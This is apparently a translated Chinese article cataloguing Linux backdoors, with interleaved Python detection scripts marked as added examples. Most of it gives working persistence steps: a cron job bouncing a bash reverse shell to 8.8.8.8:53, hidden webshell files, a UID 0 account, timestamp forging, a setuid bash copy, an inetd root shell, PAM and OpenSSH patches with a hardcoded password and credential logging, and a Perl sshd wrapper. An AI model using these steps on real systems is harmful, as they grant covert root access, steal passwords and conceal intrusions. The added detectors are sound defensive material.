Brief introduction
Use the Bash and crond that ship with Unix/Linux to get remote control: a cron job keeps trying to bounce a shell out to a machine on the public network.
Utilization method
Create a script file /etc/xxxx (pick the name yourself) and let the script bounce the shell back. The following script bounces a shell fully automatically to port 53 on 8.8.8.8.
nano /etc/xxxx
#!/bin/bash
# Only bounce if there is no connection to 8.8.8.8 already.
if netstat -ano | grep -v grep | grep "8.8.8.8" >/dev/null
then
    echo "OK" >/dev/null
else
    /sbin/iptables --policy INPUT ACCEPT
    /sbin/iptables --policy OUTPUT ACCEPT
    bash -i >& /dev/tcp/8.8.8.8/53 0>&1
fi
chmod +sx /etc/xxxx
Then modify /etc/crontab so that the script is executed periodically.
nano /etc/crontab
Add the following line at the end of /etc/crontab; it runs the script every minute.
*/1 * * * * root /etc/xxxx
Finally restart the crond service (the restart command differs between versions; check the one for your system).
service cron reload
service cron start
You can then receive the shell with nc on the 8.8.8.8 server.
nc -vv -lp 53
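From the defender's side, the cron entry and the script it points at are the artefacts to look for. The following audit is an added example, not code from the original post: it parses /etc/crontab-format text, resolves the script each job runs, and flags reverse-shell indicators such as /dev/tcp redirections; the crontab and script contents are constructed inline so it runs offline.

```python
import re
import shlex

# Indicators that commonly appear in bash-based reverse shells.
SUSPICIOUS = [
    re.compile(r"/dev/tcp/"),
    re.compile(r"/dev/udp/"),
    re.compile(r"\bbash\s+-i\b"),
    re.compile(r"\bnc\b.*\s-e\s"),
]

def crontab_commands(crontab_text):
    """Yield (schedule, user, command) from /etc/crontab-style lines."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value line
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        yield " ".join(parts[:5]), parts[5], parts[6]

def script_path(command):
    """First token of the command, e.g. /etc/xxxx."""
    try:
        return shlex.split(command)[0]
    except ValueError:
        return command.split()[0]

def find_suspicious(text):
    return [p.pattern for p in SUSPICIOUS if p.search(text)]

def audit(crontab_text, scripts):
    """scripts: dict path -> contents, standing in for reading the files."""
    findings = []
    for schedule, user, cmd in crontab_commands(crontab_text):
        path = script_path(cmd)
        hits = find_suspicious(cmd) + find_suspicious(scripts.get(path, ""))
        if hits:
            findings.append({"schedule": schedule, "user": user,
                             "path": path, "hits": sorted(set(hits))})
    return findings

# Constructed sample: a benign hourly job plus the one-minute job from the text.
SAMPLE_CRONTAB = """SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/1 * * * * root /etc/xxxx
"""
SAMPLE_SCRIPTS = {"/etc/xxxx": "bash -i >& /dev/tcp/8.8.8.8/53 0>&1\n"}
```

Per-user crontabs under /var/spool/cron have no user field, so they need a six-field split instead; the indicator list is the same.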
Linux/Unix hidden files and folders
To hide a webshell, backdoor or similar on Linux/Unix, you can use hidden files and folders.
Method one
For example, create a file or folder whose name begins with a dot. By default it is not listed, and when accessing the webshell from a browser you just add the dot to the path. (To see such files: ls -a)
touch .webshell.php     creates a file named .webshell.php
mkdir .backdoor/        creates a folder named .backdoor
The ultimate approach
Unless the administrator is unusually sharp that day, this is practically never found. At least it took me a long time to find a few.
For a file, just type ... directly into the browser path; a directory works the same way.
touch ...     creates a file named ...
mkdir ...     creates a folder named ...
This article, "Linux Backdoor Collection (Pulse Recommended)", was an original submission to Security Pulse by the ARMYZER0 team (author: "old driver"); Security Pulse (secpulse.com) published it exclusively. Contact Security Pulse for authorization before reprinting.
Linux/Unix: adding a user with UID 0
Brief introduction
On Unix systems, UID 0 means root privileges, so during a penetration a user with UID 0 can be added as a backdoor.
Use method
useradd -o -u 0 backdoor
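The -o flag lets useradd create a second account with a UID that is already taken, so the check is simply whether /etc/passwd contains more than one UID 0 entry, or any shared UID at all. Added example, not from the original post; the passwd content is constructed inline.

```python
from collections import defaultdict

def parse_passwd(text):
    """Return (name, uid, gid, home, shell) for each well-formed passwd line."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line; a real audit should report it
        name, _, uid, gid, _, home, shell = fields
        entries.append((name, int(uid), int(gid), home, shell))
    return entries

def audit_passwd(text):
    """Return (accounts with UID 0 other than root, {uid: names} for every
    UID shared by more than one account, which is what useradd -o allows)."""
    by_uid = defaultdict(list)
    for name, uid, *_ in parse_passwd(text):
        by_uid[uid].append(name)
    extra_root = [n for n in by_uid[0] if n != "root"]
    shared = {uid: names for uid, names in by_uid.items() if len(names) > 1}
    return extra_root, shared

# Constructed sample: a normal system plus the 'backdoor' account from the text.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backdoor:x:0:0::/home/backdoor:/bin/bash
fw:x:1000:1000:fw:/home/fw:/bin/bash
"""
```

The one-line equivalent for the UID 0 case on a live host is awk -F: '$3 == 0' /etc/passwd.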
Linux/Unix: modifying file timestamps
Brief introduction
A hidden backdoor on Unix must have its timestamps changed, otherwise it is easy to spot; use touch directly.
For example, take the time of index.php as the reference and apply it to webshell.php; afterwards both files show the same time.
Use method
touch -r index.php webshell.php
Or set the timestamp directly to a specific date. The example below sets January 2, 2014.
touch -t 1401021042.30 webshell.php
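touch -r and touch -t can set atime and mtime to anything, but the inode change time (ctime) is written by the kernel and cannot be chosen, so a file whose ctime is far ahead of its mtime is worth a look. This check is an added example, not from the original post; it builds its own files in a temporary directory.

```python
import os
import tempfile
import time

def ctime_mtime_gap(path):
    """Seconds by which the inode change time exceeds the modification time."""
    st = os.lstat(path)
    return st.st_ctime - st.st_mtime

def find_backdated(root, min_gap_seconds=60, suffixes=(".php", ".sh")):
    """Walk root and return (path, gap) for regular files whose ctime is more
    than min_gap_seconds after their mtime: touch -r/-t can forge atime and
    mtime, but ctime is always set by the kernel to the real time of change."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if suffixes and not fn.endswith(suffixes):
                continue
            p = os.path.join(dirpath, fn)
            if os.path.islink(p):
                continue
            gap = ctime_mtime_gap(p)
            if gap > min_gap_seconds:
                hits.append((p, gap))
    return sorted(hits)

def demo():
    """Constructed scenario in a temp dir: index.php is written normally;
    webshell.php is written now but its mtime is pushed 30 days back,
    which is what touch -r / touch -t does to the inode."""
    d = tempfile.mkdtemp()
    index = os.path.join(d, "index.php")
    shell = os.path.join(d, "webshell.php")
    for p in (index, shell):
        with open(p, "w") as f:
            f.write("<?php\n")
    old = time.time() - 30 * 86400
    os.utime(shell, (old, old))   # same effect on atime/mtime as touch
    return [os.path.basename(p) for p, _ in find_backdated(d)]
```

chmod, chown and package upgrades that preserve mtime also raise ctime, so treat a hit as a triage signal and confirm with content inspection or package checksums.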
System environment:
dawg:~# uname -a
Linux Dawg 2.4.20-1-386 #3 Sat Mar 12:11:40 EST 2003 i686 Gnu/linux
SUID Shell
Use method
First switch to the root user and execute the following commands:
dawg:~# cp /bin/bash /.woot
dawg:~# chmod 4755 /.woot
dawg:~# ls -al /.woot
-rwsr-xr-x 1 root root 690668 Jul 17:14/.woot
Of course, you can use other, better hidden names; I am sure a creative reader will come up with plenty of good ones.
The leading dot in the file name is not required; it only hides the file (a name starting with "." is hidden in any directory).
Now, as an ordinary user, let's try this backdoor:
[email protected]:~$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
[email protected]:~$ /.woot
.woot-2.05b$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
.woot-2.05b$
Why did that not work?
Because Bash 2 has some protection against setuid: it drops the effective UID unless told otherwise. But this is not insurmountable:
.woot-2.05b$ /.woot -p
.woot-2.05b# id
uid=1000(fw) gid=1000(fw) euid=0(root) groups=1000(fw)
The -p parameter gives a root shell; euid is the effective user ID.
Note that when executing this setuid shell as a normal user you must use the full path.
A small tip:
How to find files that have the setuid bit set:
dawg:~# find / -perm +4000 -ls
This lists the files with the SUID bit. (Newer GNU find versions reject +4000 and require find / -perm /4000 -ls instead.)
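Listing setuid files is the first step; the copied-shell trick from this section is easiest to confirm by comparing each setuid file's contents with the system shells. The following is an added example, not code from the original post: it walks a directory tree for setuid regular files and reports those that are byte-for-byte copies of a known shell binary, with a constructed scenario in a temporary directory.

```python
import hashlib
import os
import shutil
import stat
import tempfile

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def find_setuid(root):
    """Regular files under root with the setuid bit, like find root -perm /4000."""
    found = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            st = os.lstat(p)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(p)
    return sorted(found)

def setuid_shell_copies(root, shells=("/bin/bash", "/bin/sh", "/bin/dash")):
    """(setuid_path, matching_shell) for setuid files whose contents are a
    byte-for-byte copy of one of the known shell binaries."""
    shell_hashes = {sha256_of(s): s for s in shells if os.path.isfile(s)}
    hits = []
    for p in find_setuid(root):
        digest = sha256_of(p)
        if digest in shell_hashes:
            hits.append((p, shell_hashes[digest]))
    return hits

def demo():
    """Constructed scenario in a temp dir: a stand-in 'bash', a hidden setuid
    copy of it named .woot (cp /bin/bash /.woot; chmod 4755 /.woot from the
    text), and an unrelated setuid file that must not be reported."""
    d = tempfile.mkdtemp()
    fake_bash = os.path.join(d, "bash")
    with open(fake_bash, "wb") as f:
        f.write(b"\x7fELF stand-in shell body\n")
    woot = os.path.join(d, ".woot")
    shutil.copyfile(fake_bash, woot)
    os.chmod(woot, 0o4755)
    other = os.path.join(d, "other")
    with open(other, "wb") as f:
        f.write(b"\x7fELF unrelated setuid program\n")
    os.chmod(other, 0o4755)
    return [os.path.basename(p) for p, _ in setuid_shell_copies(d, shells=(fake_bash,))]
```

A renamed copy keeps its hash, so this catches .woot regardless of name; a stripped or recompiled shell would not match and needs the baseline comparison (setuid list against the package database) instead.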
Remote Backdoor
Utilization method
Use vi to modify the /etc/inetd.conf file.
Original file:
#chargen dgram udp wait root internal
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
#daytime stream tcp nowait root internal
Modified to:
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
daytime stream tcp nowait root /bin/bash bash -i
Start inetd:
dawg:~# inetd
If you need to force inetd to reload:
dawg:~# ps -ef | grep inetd
root       362     1  0 Jul22 ?        00:00:00 /usr/sbin/inetd
root     13769 13643  0 17:51 pts/1    00:00:00 grep inetd
dawg:~# kill -HUP 362
Now we can connect with nc and get a shell:
C:\tools>
192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.1.77] (daytime) open
bash: no job control in this shell
bash-2.05b# id
uid=0(root) gid=0(root) groups=0(root)
bash-2.05b# uname -a
Linux Dawg 2.4.20-1-386 #3 Sat April 12:11:40 EST 2003 i686 Gnu/linux
You can also add a service of your own to /etc/services:
woot 6666/tcp   # evil backdoor service
Then add it to /etc/inetd.conf:
woot stream tcp nowait root /bin/bash bash -i
Using a common port number makes it blend in better.
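Whichever service name or port is used, the line in inetd.conf still has to name an interactive shell as the server program, which is what a review of the file should key on. Added example, not code from the original post: it parses inetd.conf and /etc/services text (constructed inline) and flags active entries whose server is a shell, or whose service name is not defined in /etc/services.

```python
import re

# Interpreters that should never be the server program of an inetd service.
SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/perl"}

def parse_inetd(text):
    """Active (uncommented) inetd.conf lines as dicts:
    service socket proto wait user server [args...]"""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        f = line.split()
        if len(f) < 6:
            continue
        rows.append({"service": f[0], "socket": f[1], "proto": f[2],
                     "wait": f[3], "user": f[4], "server": f[5],
                     "args": f[6:]})
    return rows

def parse_services(text):
    """Map service name -> set of 'port/proto' from /etc/services."""
    ports = {}
    for line in text.splitlines():
        m = re.match(r"(\S+)\s+(\d+)/(tcp|udp)", line.split("#", 1)[0].strip())
        if m:
            ports.setdefault(m.group(1), set()).add(f"{m.group(2)}/{m.group(3)}")
    return ports

def audit_inetd(inetd_text, services_text):
    """Return (service, server, reasons) for suspicious active entries."""
    services = parse_services(services_text)
    findings = []
    for r in parse_inetd(inetd_text):
        reasons = []
        if r["server"] in SHELLS or "-i" in r["args"]:
            reasons.append("server program is a shell")
        if r["service"] not in services:
            reasons.append("service name not in /etc/services")
        if reasons:
            findings.append((r["service"], r["server"], reasons))
    return findings

# Constructed sample configs: the hijacked daytime entry and the custom woot
# entry from the text, plus a normal ftp entry that must not be flagged.
SAMPLE_INETD = """#discard stream tcp nowait root internal
daytime stream tcp nowait root /bin/bash bash -i
woot stream tcp nowait root /bin/bash bash -i
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd
"""
SAMPLE_SERVICES = "daytime 13/tcp\nftp 21/tcp\n"
```

xinetd keeps one file per service under /etc/xinetd.d with a server = line, so the same check applies there with a different parser.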
PAM backdoor
Brief introduction
PAM (Pluggable Authentication Modules) is an authentication mechanism proposed by Sun.
Through a set of dynamic link libraries and a unified API it separates the services a system provides from the authentication of those services, so administrators can flexibly configure different authentication methods for different services without changing the service programs, and new authentication methods can be added to the system easily.
PAM was originally integrated in Solaris and has since been ported to other systems such as Linux, SunOS, HP-UX 9.0 and so on.
The main idea of a PAM backdoor: patch pam_unix_auth.c and install the result in place of the normal PAM module.
Use method
1. Find the PAM version used by the target system:
rpm -qa | grep pam
2. Compile and install PAM.
3. Patch the local pam_unix_auth.c, then compile and build it.
4. The built module is at modules/pam_unix/.libs/pam_unix.so; the backdoor password is root123, and the root password is logged to /tmp/pslog.
Characteristics:
Advantage: Strong concealment, not easy to detect.
Disadvantage: Needs a build environment; missing gcc or other dependencies easily causes problems.
OpenSSH backdoor
Brief introduction
Download the latest OpenSSH release and the matching patch package; the patch package contains the backdoor patch sshbd5.9p1.diff.
Files it touches: auth.c, auth-pam.c, auth-passwd.c, canohost.c, includes.h, log.c, servconf.c, sshconnect2.c, sshlogin.c, version.h
Use method
# tar -zxvf openssh-5.9p1.tar.gz
# tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz
vim includes.h    // set the backdoor password and the log file locations
/*
#define ILOG "/tmp/ilog"      // records user names and passwords used to log in to this machine
#define OLOG "/tmp/olog"      // records user names and passwords used to log in from this machine to remote hosts
#define SECRETPW "root123"    // the backdoor password
*/
Characteristics:
Advantage: Strong concealment, not easy to detect.
Disadvantage: Needs a build environment; missing gcc or other dependencies easily causes problems.
Quick SSH backdoor
Brief introduction
Running the command below opens a listener on port 31337; connect to it and log in as root, bin, ftp or mail with any password.
Use method
Execute on the remote host:
# ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=31337;
A listener appears on port 31337; connect to it and log in as root, bin, ftp or mail with an arbitrary password.
Characteristics:
Advantage: Quick to set up for a short-lived connection, though concealment is weak.
Disadvantage: Does not survive a reboot, after which the connection cannot be re-established.
SSH Wrapper Backdoor
Brief introduction
Init starts /usr/sbin/sshd, which is now the wrapper script. At that point getpeername on stdin fails (stdin is not a socket), so the regular expression does not match and the script moves on to the next statement, which starts /usr/bin/sshd, the original daemon.
When the original sshd accepts a TCP connection on its listening port, it forks a child process to handle it. That child performs no check; it simply executes the sshd at the system's default location, /usr/sbin/sshd, which hands control back to the script.
At this point the child's standard input and output are already redirected to the socket, so getpeername really does return the client's address, and if the TCP source port is 19526 the script execs sh and hands out a shell.
Use method
On the target host:
[email protected] ~]# cd /usr/sbin
[email protected] sbin]# mv sshd ../bin
[email protected] sbin]# echo '#!/usr/bin/perl' >sshd
[email protected] sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^...4a/);' >>sshd
[email protected] sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd", @ARGV,' >>sshd
[email protected] sbin]# chmod u+x sshd
[email protected] sbin]# /etc/init.d/sshd restart
Control side:
socat STDIO TCP4:target_ip:22,sourceport=19526
Characteristics:
Advantage: Strong concealment, no compiling needed, works in most environments.
Disadvantage: The sshd process has to be restarted.
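The wrapper leaves a simple fingerprint: the sshd the init system starts is a Perl script instead of the ELF executable the package installed, and the real binary now sits at /usr/bin/sshd. The check below is an added example, not code from the original post; it classifies an executable by its magic bytes, looks for the wrapper's keywords in a script, and builds its own stand-in files in a temporary directory.

```python
import os
import tempfile

ELF_MAGIC = b"\x7fELF"

def classify_executable(path):
    """'elf', 'script' (shebang) or 'other', from the first bytes of the file."""
    with open(path, "rb") as f:
        head = f.read(4)
    if head == ELF_MAGIC:
        return "elf"
    if head.startswith(b"#!"):
        return "script"
    return "other"

def wrapper_indicators(path):
    """Reasons to suspect that the sshd at path is a wrapper rather than the
    real daemon: the package installs an ELF executable, while the wrapper
    described in the text is a Perl script that inspects the peer address
    and execs another program."""
    reasons = []
    kind = classify_executable(path)
    if kind != "elf":
        reasons.append(f"not an ELF binary ({kind})")
    if kind == "script":
        with open(path, "rb") as f:
            body = f.read(4096)
        for needle in (b"getpeername", b"exec", b"/bin/sh"):
            if needle in body:
                reasons.append(f"script mentions {needle.decode()}")
    return reasons

def demo():
    """Constructed files in a temp dir: a minimal ELF-looking sshd and a
    stand-in wrapper script that carries the wrapper's keywords."""
    d = tempfile.mkdtemp()
    real = os.path.join(d, "sshd.real")
    with open(real, "wb") as f:
        f.write(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 13)
    wrapped = os.path.join(d, "sshd")
    with open(wrapped, "wb") as f:
        f.write(b"#!/usr/bin/perl\n# stand-in: getpeername(STDIN) then exec\n")
    return wrapper_indicators(real), wrapper_indicators(wrapped)
```

On a live host, also compare the file against the package database (rpm -V openssh-server, or debsums openssh-server on Debian-based systems) and check whether an unexpected /usr/bin/sshd exists.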
Mafix rootkit backdoor
Brief introduction
Mafix is a commonly used lightweight application-level rootkit. Its configuration is simple, the authentication password and port number can be customized, and it provides remote login through a forged SSH protocol vulnerability.
Use method
Once installation is complete, you can log in remotely with ssh user@ip -p <configured port>.
Characteristics:
Advantage: Moderate concealment, no compiling needed.
Disadvantage: Replaces ls and other commands, so it is easy to detect.